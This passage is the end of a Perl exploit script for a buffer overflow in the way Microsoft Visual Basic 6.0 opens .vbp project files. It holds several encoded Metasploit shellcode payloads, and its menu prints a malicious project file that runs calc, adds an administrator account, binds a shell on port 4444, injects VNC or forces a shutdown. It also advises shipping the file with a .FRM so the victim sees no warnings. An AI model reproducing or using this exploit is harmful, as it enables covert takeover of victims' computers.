\n\"\\x41\\x32\\x41\\x44\\x30\\x41\\x44\\x54\\x42\\x44\\x51\\x42\\x30\\x41\\x44\\x41\". \n\"\\x56\\x58\\x34\\x5a\\x38\\x42\\x44\\x4a\\x4f\\x4d\\x4a\\x4e\\x48\\x55\\x42\\x50\". \n\"\\x42\\x30\\x42\\x30\\x43\\x55\\x45\\x35\\x48\\x45\\x47\\x45\\x4b\\x38\\x4e\\x36\". 
\n\"\\x46\\x42\\x4a\\x31\\x4b\\x38\\x45\\x54\\x4e\\x33\\x4b\\x48\\x46\\x55\\x45\\x30\". \n\"\\x4a\\x47\\x41\\x50\\x4c\\x4e\\x4b\\x58\\x4c\\x54\\x4a\\x31\\x4b\\x48\\x4c\\x55\". \n\"\\x42\\x42\\x41\\x50\\x4b\\x4e\\x43\\x4e\\x44\\x43\\x49\\x54\\x4b\\x58\\x46\\x33\". \n\"\\x4b\\x48\\x41\\x30\\x50\\x4e\\x41\\x33\\x4f\\x4f\\x4e\\x4f\\x41\\x43\\x42\\x4c\". \n\"\\x4e\\x4a\\x4a\\x53\\x42\\x4e\\x46\\x57\\x47\\x30\\x41\\x4c\\x4f\\x4c\\x4d\\x30\". \n\"\\x41\\x30\\x47\\x4c\\x4b\\x4e\\x44\\x4f\\x4b\\x33\\x4e\\x47\\x46\\x42\\x46\\x51\". \n\"\\x45\\x37\\x41\\x4e\\x4b\\x38\\x4c\\x35\\x46\\x52\\x41\\x30\\x4b\\x4e\\x48\\x56\". \n\"\\x4b\\x58\\x4e\\x50\\x4b\\x54\\x4b\\x48\\x4c\\x55\\x4e\\x51\\x41\\x30\\x4b\\x4e\". \n\"\\x4b\\x58\\x46\\x30\\x4b\\x58\\x41\\x50\\x4a\\x4e\\x4b\\x4e\\x44\\x50\\x41\\x43\". \n\"\\x42\\x4c\\x4f\\x35\\x50\\x35\\x4d\\x35\\x4b\\x45\\x44\\x4c\\x4a\\x50\\x42\\x50\". \n\"\\x50\\x55\\x4c\\x36\\x42\\x33\\x49\\x55\\x46\\x46\\x4b\\x58\\x49\\x31\\x4b\\x38\". \n\"\\x4b\\x45\\x4e\\x50\\x4b\\x38\\x4b\\x35\\x4e\\x31\\x4b\\x48\\x4b\\x51\\x4b\\x58\". \n\"\\x4b\\x45\\x4a\\x30\\x43\\x55\\x4a\\x56\\x50\\x38\\x50\\x34\\x50\\x50\\x4e\\x4e\". \n\"\\x4f\\x4f\\x48\\x4d\\x49\\x48\\x47\\x4c\\x41\\x58\\x4e\\x4e\\x42\\x50\\x41\\x50\". \n\"\\x42\\x50\\x42\\x30\\x47\\x45\\x48\\x55\\x43\\x45\\x49\\x38\\x45\\x4e\\x4a\\x4e\". \n\"\\x47\\x52\\x42\\x30\\x42\\x30\\x42\\x30\\x42\\x59\\x41\\x50\\x42\\x30\\x42\\x50\". \n\"\\x48\\x4b\\x49\\x51\\x4a\\x51\\x47\\x4e\\x46\\x4a\\x49\\x31\\x42\\x47\\x49\\x4e\". \n\"\\x45\\x4e\\x49\\x54\\x48\\x58\\x49\\x54\\x46\\x4a\\x4c\\x51\\x42\\x37\\x47\\x4c\". \n\"\\x46\\x4a\\x4d\\x4a\\x50\\x42\\x49\\x4e\\x49\\x4d\\x49\\x50\\x45\\x4f\\x4d\\x4a\". \n\"\\x4b\\x4c\\x4d\\x4e\\x4e\\x4f\\x4b\\x43\\x47\\x45\\x43\\x35\\x44\\x33\\x4f\\x45\". \n\"\\x43\\x33\\x44\\x43\\x42\\x30\\x4b\\x45\\x4d\\x38\\x4b\\x34\\x42\\x42\\x41\\x55\". \n\"\\x4f\\x4f\\x47\\x4d\\x49\\x58\\x4f\\x4d\\x49\\x38\\x43\\x4c\\x4d\\x58\\x45\\x47\". 
\n\"\\x46\\x41\\x4c\\x36\\x47\\x30\\x49\\x45\\x41\\x35\\x43\\x45\\x4f\\x4f\\x46\\x43\". \n\"\\x4f\\x38\\x4f\\x4f\\x45\\x35\\x46\\x50\\x49\\x35\\x49\\x58\\x46\\x50\\x50\\x48\". \n\"\\x44\\x4e\\x44\\x4f\\x4b\\x32\\x47\\x52\\x46\\x35\\x4f\\x4f\\x47\\x43\\x4f\\x4f\". \n\"\\x45\\x35\\x42\\x43\\x41\\x53\\x42\\x4c\\x42\\x45\\x42\\x35\\x42\\x35\\x42\\x55\". \n\"\\x42\\x54\\x42\\x55\\x42\\x44\\x42\\x35\\x4f\\x4f\\x45\\x45\\x4e\\x32\\x49\\x48\". \n\"\\x47\\x4c\\x41\\x53\\x4b\\x4d\\x43\\x45\\x43\\x45\\x4a\\x46\\x44\\x30\\x42\\x50\". \n\"\\x41\\x31\\x4e\\x55\\x49\\x48\\x42\\x4e\\x4c\\x36\\x42\\x31\\x42\\x35\\x47\\x55\". \n\"\\x4f\\x4f\\x45\\x35\\x46\\x32\\x43\\x55\\x47\\x45\\x4f\\x4f\\x45\\x45\\x4a\\x32\". \n\"\\x43\\x55\\x46\\x35\\x47\\x45\\x4f\\x4f\\x45\\x55\\x42\\x32\\x49\\x48\\x47\\x4c\". \n\"\\x41\\x58\\x4e\\x4e\\x42\\x50\\x42\\x31\\x42\\x50\\x42\\x50\\x49\\x58\\x43\\x4e\". \n\"\\x4c\\x46\\x42\\x50\\x4a\\x46\\x42\\x30\\x42\\x51\\x42\\x30\\x42\\x30\\x43\\x35\". \n\"\\x47\\x45\\x4f\\x4f\\x45\\x35\\x4a\\x31\\x41\\x58\\x4e\\x4e\\x42\\x30\\x46\\x30\". \n\"\\x42\\x30\\x42\\x30\\x4f\\x4f\\x43\\x4d\\x5a\"; \n \n# win32_exec - EXITFUNC=seh CMD=shutdown -c \"HAI VEn0m pwn3d j00r b0x0r wif k0sh1 u b1tch\" Size=451 Encoder=PexAlphaNum http://metasploit.com \n$shellc5 = \"\\xeb\\x03\\x59\\xeb\\x05\\xe8\\xf8\\xff\\xff\\xff\\x4f\\x49\\x49\\x49\\x49\\x49\". \n\"\\x49\\x51\\x5a\\x56\\x54\\x58\\x36\\x33\\x30\\x56\\x58\\x34\\x41\\x30\\x42\\x36\". \n\"\\x48\\x48\\x30\\x42\\x33\\x30\\x42\\x43\\x56\\x58\\x32\\x42\\x44\\x42\\x48\\x34\". \n\"\\x41\\x32\\x41\\x44\\x30\\x41\\x44\\x54\\x42\\x44\\x51\\x42\\x30\\x41\\x44\\x41\". \n\"\\x56\\x58\\x34\\x5a\\x38\\x42\\x44\\x4a\\x4f\\x4d\\x4e\\x4f\\x4a\\x4e\\x46\\x34\". \n\"\\x42\\x50\\x42\\x50\\x42\\x30\\x4b\\x38\\x45\\x54\\x4e\\x43\\x4b\\x38\\x4e\\x47\". \n\"\\x45\\x30\\x4a\\x47\\x41\\x30\\x4f\\x4e\\x4b\\x38\\x4f\\x54\\x4a\\x51\\x4b\\x48\". \n\"\\x4f\\x35\\x42\\x32\\x41\\x50\\x4b\\x4e\\x49\\x54\\x4b\\x38\\x46\\x43\\x4b\\x48\". 
\n\"\\x41\\x50\\x50\\x4e\\x41\\x53\\x42\\x4c\\x49\\x59\\x4e\\x4a\\x46\\x58\\x42\\x4c\". \n\"\\x46\\x47\\x47\\x30\\x41\\x4c\\x4c\\x4c\\x4d\\x50\\x41\\x50\\x44\\x4c\\x4b\\x4e\". \n\"\\x46\\x4f\\x4b\\x53\\x46\\x55\\x46\\x32\\x46\\x30\\x45\\x37\\x45\\x4e\\x4b\\x38\". \n\"\\x4f\\x55\\x46\\x52\\x41\\x50\\x4b\\x4e\\x48\\x56\\x4b\\x48\\x4e\\x50\\x4b\\x34\". \n\"\\x4b\\x38\\x4f\\x45\\x4e\\x31\\x41\\x30\\x4b\\x4e\\x4b\\x38\\x4e\\x31\\x4b\\x48\". \n\"\\x41\\x50\\x4b\\x4e\\x49\\x48\\x4e\\x35\\x46\\x32\\x46\\x50\\x43\\x4c\\x41\\x43\". \n\"\\x42\\x4c\\x46\\x56\\x4b\\x48\\x42\\x34\\x42\\x43\\x45\\x58\\x42\\x4c\\x4a\\x37\". \n\"\\x4e\\x50\\x4b\\x38\\x42\\x34\\x4e\\x50\\x4b\\x38\\x42\\x57\\x4e\\x51\\x4d\\x4a\". \n\"\\x4b\\x58\\x4a\\x36\\x4a\\x50\\x4b\\x4e\\x49\\x30\\x4b\\x58\\x42\\x58\\x42\\x4b\". \n\"\\x42\\x50\\x42\\x30\\x42\\x50\\x4b\\x48\\x4a\\x46\\x4e\\x43\\x4f\\x45\\x41\\x53\". \n\"\\x48\\x4f\\x42\\x36\\x48\\x35\\x49\\x48\\x4a\\x4f\\x43\\x58\\x42\\x4c\\x4b\\x37\". \n\"\\x42\\x45\\x4a\\x56\\x42\\x4f\\x4c\\x48\\x46\\x30\\x4f\\x55\\x4a\\x56\\x4a\\x39\". \n\"\\x50\\x4f\\x4c\\x58\\x50\\x50\\x47\\x45\\x4f\\x4f\\x47\\x4e\\x43\\x37\\x4a\\x56\". \n\"\\x45\\x47\\x46\\x37\\x46\\x46\\x4f\\x36\\x47\\x37\\x50\\x46\\x42\\x42\\x4d\\x42\". \n\"\\x43\\x36\\x42\\x42\\x44\\x42\\x4a\\x34\\x41\\x54\\x49\\x34\\x42\\x42\\x48\\x35\". \n\"\\x45\\x34\\x50\\x56\\x42\\x33\\x4d\\x56\\x42\\x52\\x42\\x57\\x47\\x57\\x50\\x56\". \n\"\\x43\\x33\\x46\\x36\\x42\\x32\\x4c\\x46\\x42\\x33\\x42\\x33\\x44\\x37\\x42\\x32\". \n\"\\x44\\x46\\x42\\x53\\x4a\\x57\\x42\\x33\\x44\\x47\\x42\\x52\\x47\\x47\\x49\\x56\". \n\"\\x48\\x46\\x42\\x52\\x4b\\x56\\x42\\x33\\x43\\x57\\x4a\\x56\\x41\\x53\\x42\\x32\". \n\"\\x45\\x37\\x42\\x32\\x44\\x56\\x41\\x43\\x46\\x37\\x43\\x46\\x4a\\x56\\x44\\x32\". 
\n\"\\x42\\x30\\x5a\"; \n \n$endQuote = \"\\x22\"; \n \n$i = $ARGV[0]; \n \n \nif ($i==1){ \nprint \"$begin0$begin1$BuffOf$codeAddr$jmpEbp$fourSkin$begin2$begin3$shellc1$endQuote$koshi\"; \nexit; \n} \n \n \nif ($i==2){ \nprint \"$begin0$begin1$BuffOf$codeAddr$jmpEbp$fourSkin$begin2$begin3$shellc2$endQuote$koshi\"; \nexit; \n} \n \n \nif ($i==3){ \nprint \"$begin0$begin1$BuffOf$codeAddr$jmpEbp$fourSkin$begin2$begin3$shellc3$endQuote$koshi\"; \nexit; \n} \n \n \nif ($i==4){ \nprint \"$begin0$begin1$BuffOf$codeAddr$jmpEbp$fourSkin$begin2$begin3$shellc4$endQuote$koshi\"; \nexit; \n} \n \n \nif ($i==5){ \nprint \"$begin0$begin1$BuffOf$codeAddr$jmpEbp$fourSkin$begin2$begin3$shellc5$endQuote$koshi\"; \nexit; \n} \n \n \nprint \"\\n\"; \nprint \" ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\\n\"; \nprint \" +++ +++\\n\"; \nprint \" +++ +++\\n\"; \nprint \" +++ Microsoft Visual Basic 6.0 VBP_Open OLE Local CodeExec +++\\n\"; \nprint \" +++ Written By Koshi +++\\n\"; \nprint \" +++ Greets: Rima my baby! Draven, thanks for helping. +++\\n\"; \nprint \" +++ +++\\n\"; \nprint \" +++ Usage Ex.: ./vb6.pl 1 >>Project1.vbp +++\\n\"; \nprint \" +++ +++\\n\"; \nprint \" +++ Options: +++\\n\"; \nprint \" +++ 1 - win32_exec CALC.EXE +++\\n\"; \nprint \" +++ 2 - win32_adduser Pass=4dmin User=koshi +++\\n\"; \nprint \" +++ 3 - win32_bind Port 4444 +++\\n\"; \nprint \" +++ 4 - win32_bind_vncinject Port 5900 +++\\n\"; \nprint \" +++ 5 - win32_exec shutdown -c \\x22HAI VEn0m pw.. +++\\n\"; \nprint \" +++ +++\\n\"; \nprint \" +++ +++\\n\"; \nprint \" +++ Notes: Ship final .VBP file with a .FRM file to avoid +++\\n\"; \nprint \" +++ warnings in Visual Basic 6.0 +++\\n\"; \nprint \" +++ +++\\n\"; \nprint \" ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\\n\"; \n \n \n \n \n \n \nexit; \n \n \n#EOF \n`\n"}
{}